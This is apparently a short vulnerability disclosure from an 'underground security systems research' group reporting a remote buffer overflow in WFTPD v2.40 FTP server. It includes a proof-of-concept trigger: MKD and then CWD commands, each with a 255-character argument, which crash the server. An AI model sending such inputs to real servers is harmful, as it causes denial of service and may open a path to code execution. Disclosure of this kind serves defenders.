From: Luciano Martins Subject: WFTPD v2.40 FTPServer remotely exploitable buffer overflow vulnerability We found in the WFTPD v2.34,v2.40 Server and earlier a vulnerable to remotely exploitable buffer overflow. This can result in a denial of service and at worst in arbitrary code being executed on the system. The vulnerabilities are the conjunction of two large commands the MKD and CWD if they are passed an argument a string exact of 255 characters, If this 2 large commands are passed in order program crash. Tested in: Windows 98 / Windows Nt Example: First command MKD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa Second command CWD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa Crash.....Overflow. Luck Martins u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h WWW.USSRBACK.COM